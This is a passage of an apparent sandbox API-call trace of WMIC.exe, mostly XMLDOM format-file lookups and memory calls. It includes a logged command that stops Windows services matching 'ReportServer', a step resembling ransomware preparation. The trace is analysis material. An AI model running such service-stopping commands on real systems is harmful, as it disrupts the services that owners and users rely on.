listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.316] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.316] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.316] malloc (_Size=0xc) returned 0x320ab88 [0280.317] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.317] free (_Block=0x320ab88) [0280.317] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0280.317] malloc (_Size=0xc) returned 0x320ab58 [0280.317] malloc (_Size=0xc) returned 0x320ac90 [0280.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.317] SysStringLen (param_1="TABLE") returned 0x5 [0280.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.317] SysStringLen (param_1="XML") returned 0x3 [0280.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.317] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.317] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.317] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.317] malloc (_Size=0x18) returned 0x3202d88 [0280.317] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.317] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.318] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.318] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=12, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.318] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.318] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.318] malloc (_Size=0xc) returned 0x320ab70 [0280.318] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.318] free (_Block=0x320ab70) [0280.318] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0280.318] malloc (_Size=0xc) returned 0x320acc0 [0280.318] malloc (_Size=0xc) returned 0x320ab40 [0280.319] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.319] SysStringLen (param_1="TABLE") returned 0x5 [0280.319] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.319] SysStringLen (param_1="XML") returned 0x3 [0280.319] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.319] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.319] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.319] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.319] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.319] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.319] malloc (_Size=0x18) returned 0x3202c08 [0280.319] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.319] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.319] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.319] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=13, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.319] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.319] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.320] malloc (_Size=0xc) returned 0x320ac60 [0280.320] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.320] free (_Block=0x320ac60) [0280.320] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0280.320] malloc (_Size=0xc) returned 0x320ac30 [0280.320] malloc (_Size=0xc) returned 0x320ac60 [0280.320] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.320] SysStringLen (param_1="TABLE") returned 0x5 [0280.320] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.320] SysStringLen (param_1="XML") returned 0x3 [0280.320] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.320] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.320] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.320] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.320] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.320] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.320] malloc (_Size=0x18) returned 0x3202c28 [0280.322] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.322] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.322] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.322] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=14, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.322] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="texttable.xsl") returned 0x0 [0280.322] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.323] malloc (_Size=0xc) returned 0x320adb0 [0280.323] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.323] free (_Block=0x320adb0) [0280.323] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0280.323] malloc (_Size=0xc) returned 0x320abd0 [0280.323] malloc (_Size=0xc) returned 0x320ad20 [0280.323] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0280.323] SysStringLen (param_1="TABLE") returned 0x5 [0280.323] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0280.323] SysStringLen (param_1="XML") returned 0x3 [0280.323] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0280.323] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.323] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0280.323] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.323] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0280.323] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.323] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.323] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0280.324] malloc (_Size=0x18) returned 0x3202c48 [0280.324] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.324] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.324] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.324] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=15, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.324] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="htable.xsl") returned 0x0 [0280.324] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.324] malloc (_Size=0xc) returned 0x320adc8 [0280.324] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.324] free (_Block=0x320adc8) [0280.324] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0280.324] malloc (_Size=0xc) returned 0x320ad98 [0280.325] malloc (_Size=0xc) returned 0x320acd8 [0280.325] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0280.325] SysStringLen (param_1="TABLE") returned 0x5 [0280.325] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0280.325] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.325] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0280.325] SysStringLen (param_1="XML") returned 0x3 [0280.325] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0280.325] SysStringLen (param_1="texttablewsys") returned 0xd [0280.325] SysStringLen (param_1="XML") returned 0x3 [0280.325] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0280.325] malloc (_Size=0x18) returned 0x3202b88 [0280.325] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.325] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.325] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.325] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=16, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.325] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="htable.xsl") returned 0x0 [0280.325] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.326] malloc (_Size=0xc) returned 0x320acf0 [0280.326] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.326] free (_Block=0x320acf0) [0280.326] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0280.326] malloc (_Size=0xc) returned 0x320acf0 [0280.326] malloc (_Size=0xc) returned 0x320adf8 [0280.326] SysStringLen (param_1="htable-sortby") returned 0xd [0280.326] SysStringLen (param_1="TABLE") returned 0x5 [0280.326] SysStringLen (param_1="htable-sortby") returned 0xd [0280.326] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.326] SysStringLen (param_1="htable-sortby") returned 0xd [0280.326] SysStringLen (param_1="XML") returned 0x3 [0280.326] SysStringLen (param_1="htable-sortby") returned 0xd [0280.326] SysStringLen (param_1="texttablewsys") returned 0xd [0280.326] SysStringLen (param_1="htable-sortby") returned 0xd [0280.326] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0280.327] SysStringLen (param_1="XML") returned 0x3 [0280.327] SysStringLen (param_1="htable-sortby") returned 0xd [0280.327] malloc (_Size=0x18) returned 0x3202aa8 [0280.327] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.327] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.327] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.327] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=17, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.327] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="mof.xsl") returned 0x0 [0280.327] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.327] malloc (_Size=0xc) returned 0x320ad50 [0280.328] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.328] free (_Block=0x320ad50) [0280.328] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0280.328] malloc (_Size=0xc) returned 0x320ad38 [0280.328] malloc (_Size=0xc) returned 0x320ade0 [0280.328] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0280.328] SysStringLen (param_1="TABLE") returned 0x5 [0280.328] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0280.328] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.328] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0280.328] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.328] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0280.328] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.328] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.328] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0280.328] malloc (_Size=0x18) returned 0x3202ba8 [0280.328] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.329] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.329] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.329] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=18, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.329] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="mof.xsl") returned 0x0 [0280.329] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.329] malloc (_Size=0xc) returned 0x320adb0 [0280.329] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.329] free (_Block=0x320adb0) [0280.329] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0280.329] malloc (_Size=0xc) returned 0x320ab88 [0280.329] malloc (_Size=0xc) returned 0x320ad68 [0280.329] SysStringLen (param_1="wmiclimofformat") returned 0xf [0280.329] SysStringLen (param_1="TABLE") returned 0x5 [0280.329] SysStringLen (param_1="wmiclimofformat") returned 0xf [0280.330] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.330] SysStringLen (param_1="wmiclimofformat") returned 0xf [0280.330] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.330] SysStringLen (param_1="wmiclimofformat") returned 0xf [0280.330] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0280.330] SysStringLen (param_1="wmiclimofformat") returned 0xf [0280.330] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0280.330] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.330] SysStringLen (param_1="wmiclimofformat") returned 0xf [0280.330] malloc (_Size=0x18) returned 0x3202ce8 [0280.330] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.330] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.330] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.330] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=19, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.330] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="textvaluelist.xsl") returned 0x0 [0280.330] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.330] malloc (_Size=0xc) returned 0x320ab28 [0280.330] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.331] free (_Block=0x320ab28) [0280.331] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0280.331] malloc (_Size=0xc) returned 0x320aba0 [0280.331] malloc (_Size=0xc) returned 0x320ad08 [0280.331] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0280.331] SysStringLen (param_1="TABLE") returned 0x5 [0280.331] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0280.331] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.331] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0280.331] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.331] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0280.331] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.331] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.331] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0280.331] malloc (_Size=0x18) returned 0x3202d08 [0280.331] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.331] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.331] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.331] IXMLDOMNodeList:get_item (in: This=0x3749ca0, index=20, listItem=0x9cf9b4 | out: listItem=0x9cf9b4*=0x3746b88) returned 0x0 [0280.332] IXMLDOMNode:get_text (in: This=0x3746b88, text=0x9cf9b8 | out: text=0x9cf9b8*="textvaluelist.xsl") returned 0x0 [0280.332] IXMLDOMNode:get_attributes (in: This=0x3746b88, attributeMap=0x9cf9b0 | out: attributeMap=0x9cf9b0*=0x3749fa8) returned 0x0 [0280.332] malloc (_Size=0xc) returned 0x320ad50 [0280.332] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3749fa8, name="KEYWORD", namedItem=0x9cf9ac | out: namedItem=0x9cf9ac*=0x3749ff8) returned 0x0 [0280.332] free (_Block=0x320ad50) [0280.332] IXMLDOMNode:get_nodeValue (in: This=0x3749ff8, value=0x9cf96c | out: value=0x9cf96c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0280.332] malloc (_Size=0xc) returned 0x320ad50 [0280.332] malloc (_Size=0xc) returned 0x320ab70 [0280.332] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0280.332] SysStringLen (param_1="TABLE") returned 0x5 [0280.332] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0280.332] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0280.332] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0280.332] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0280.332] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0280.333] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.333] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0280.333] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0280.333] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0280.333] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0280.333] malloc (_Size=0x18) returned 0x3202c88 [0280.333] IUnknown:Release (This=0x3746b88) returned 0x0 [0280.333] IUnknown:Release (This=0x3749fa8) returned 0x0 [0280.333] IUnknown:Release (This=0x3749ff8) returned 0x0 [0280.333] IUnknown:Release (This=0x3749ca0) returned 0x0 [0280.333] FreeThreadedDOMDocument:IUnknown:Release (This=0x3746b48) returned 0x1 [0280.333] FreeThreadedDOMDocument:IUnknown:Release (This=0x37445a8) returned 0x0 [0280.333] free (_Block=0x3209838) [0280.333] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice" [0280.333] malloc (_Size=0xe0) returned 0x320aee8 [0280.334] memcpy_s (in: _Destination=0x320aee8, _DestinationSize=0xde, _Source=0x2fe1b78, _SourceSize=0xd8 | out: _Destination=0x320aee8) returned 0x0 [0280.334] malloc (_Size=0xc) returned 0x320ad80 [0280.334] malloc (_Size=0xc) returned 0x320abb8 [0280.334] malloc (_Size=0xc) returned 0x320adb0 [0280.334] malloc (_Size=0xc) returned 0x320abe8 [0280.334] malloc (_Size=0x80) returned 0x320afd0 [0280.334] GetLocalTime (in: lpSystemTime=0x9cf950 | out: lpSystemTime=0x9cf950*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x2e, wMilliseconds=0x186)) [0280.334] _vsnwprintf (in: _Buffer=0x320afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x9cf930 | out: _Buffer="04-02-2020T08:28:46") returned 19 [0280.334] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.334] malloc (_Size=0x94) returned 0x320b058 [0280.334] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.334] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.334] malloc (_Size=0x94) returned 0x320b0f8 [0280.334] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.334] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.335] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.335] malloc (_Size=0xa) returned 0x320ab10 [0280.335] lstrlenW (lpString="path") returned 4 [0280.335] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0280.335] malloc (_Size=0xa) returned 0x320adc8 [0280.335] malloc (_Size=0x4) returned 0x3202ed8 [0280.335] free (_Block=0x0) [0280.335] free (_Block=0x320ab10) [0280.335] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.335] malloc (_Size=0x1c) returned 0x3209da8 [0280.335] lstrlenW (lpString="Win32_Service") returned 13 [0280.335] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0280.335] malloc (_Size=0x1c) returned 0x320b198 [0280.335] malloc (_Size=0x8) returned 0x3202ee8 [0280.335] memmove_s (in: _Destination=0x3202ee8, _DestinationSize=0x4, _Source=0x3202ed8, _SourceSize=0x4 | out: _Destination=0x3202ee8) returned 0x0 [0280.335] free (_Block=0x3202ed8) [0280.335] free (_Block=0x0) [0280.335] free (_Block=0x3209da8) [0280.335] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.335] malloc (_Size=0xc) returned 0x320ab10 [0280.335] lstrlenW (lpString="where") returned 5 [0280.335] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0280.335] malloc (_Size=0xc) returned 0x320ab28 [0280.336] malloc (_Size=0xc) returned 0x320ac00 [0280.336] memmove_s (in: _Destination=0x320ac00, _DestinationSize=0x8, _Source=0x3202ee8, _SourceSize=0x8 | out: _Destination=0x320ac00) returned 0x0 [0280.336] free (_Block=0x3202ee8) [0280.336] free (_Block=0x0) [0280.336] free (_Block=0x320ab10) [0280.336] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.336] malloc (_Size=0x3e) returned 0x320b1c0 [0280.336] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0280.336] _wcsicmp (_String1="\"name like '%%ReportServer%%'\"", _String2="\"NULL\"") returned -20 [0280.336] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0280.336] lstrlenW (lpString="\"name like '%%ReportServer%%'\"") returned 30 [0280.336] malloc (_Size=0x3e) returned 0x320b208 [0280.336] malloc (_Size=0x10) returned 0x320ab10 [0280.336] memmove_s (in: _Destination=0x320ab10, _DestinationSize=0xc, _Source=0x320ac00, _SourceSize=0xc | out: _Destination=0x320ab10) returned 0x0 [0280.336] free (_Block=0x320ac00) [0280.336] free (_Block=0x0) [0280.336] free (_Block=0x320b1c0) [0280.336] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.336] malloc (_Size=0xa) returned 0x320ac00 [0280.336] lstrlenW (lpString="call") returned 4 [0280.336] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0280.336] malloc (_Size=0xa) returned 0x320ac48 [0280.336] malloc (_Size=0x18) returned 0x3202ac8 [0280.336] memmove_s (in: _Destination=0x3202ac8, _DestinationSize=0x10, _Source=0x320ab10, _SourceSize=0x10 | out: _Destination=0x3202ac8) returned 0x0 [0280.336] free (_Block=0x320ab10) [0280.336] free (_Block=0x0) [0280.336] free (_Block=0x320ac00) [0280.337] lstrlenW (lpString=" path Win32_Service where \"name like '%%ReportServer%%'\" call stopservice") returned 73 [0280.337] malloc (_Size=0x18) returned 0x3202a68 [0280.337] lstrlenW (lpString="stopservice") returned 11 [0280.337] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0280.337] malloc (_Size=0x18) returned 0x3202ae8 [0280.337] free (_Block=0x0) [0280.337] free (_Block=0x3202a68) [0280.337] malloc (_Size=0x18) returned 0x3202a68 [0280.337] lstrlenW (lpString="QUIT") returned 4 [0280.337] lstrlenW (lpString="path") returned 4 [0280.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0280.337] lstrlenW (lpString="EXIT") returned 4 [0280.337] lstrlenW (lpString="path") returned 4 [0280.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0280.337] free (_Block=0x3202a68) [0280.337] WbemLocator:IUnknown:AddRef (This=0x2ff4980) returned 0x2 [0280.337] malloc (_Size=0x18) returned 0x3202bc8 [0280.337] lstrlenW (lpString="/") returned 1 [0280.337] lstrlenW (lpString="path") returned 4 [0280.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0280.337] lstrlenW (lpString="-") returned 1 [0280.337] lstrlenW (lpString="path") returned 4 [0280.337] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0280.338] lstrlenW (lpString="CLASS") returned 5 [0280.338] lstrlenW (lpString="path") returned 4 [0280.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0280.338] lstrlenW (lpString="PATH") returned 4 [0280.338] lstrlenW (lpString="path") returned 4 [0280.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0280.338] lstrlenW (lpString="/") returned 1 [0280.338] lstrlenW (lpString="Win32_Service") returned 13 [0280.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0280.338] lstrlenW (lpString="-") returned 1 [0280.338] lstrlenW (lpString="Win32_Service") returned 13 [0280.338] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0280.338] lstrlenW (lpString="Win32_Service") returned 13 [0280.338] malloc (_Size=0x1c) returned 0x3209da8 [0280.338] lstrlenW (lpString="Win32_Service") returned 13 [0280.338] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x6ec2121 | out: _String="Win32_Service", _Context=0x6ec2121) returned="Win32_Service" [0280.339] lstrlenW (lpString="Win32_Service") returned 13 [0280.339] malloc (_Size=0x1c) returned 0x320b1c0 [0280.339] lstrlenW (lpString="Win32_Service") returned 13 [0280.339] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x6ec2121 | out: _String=0x0, _Context=0x6ec2121) returned 0x0 [0280.339] lstrlenW (lpString="") returned 0 [0280.339] lstrlenW (lpString="WHERE") returned 5 [0280.339] lstrlenW (lpString="where") returned 5 [0280.339] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0280.339] 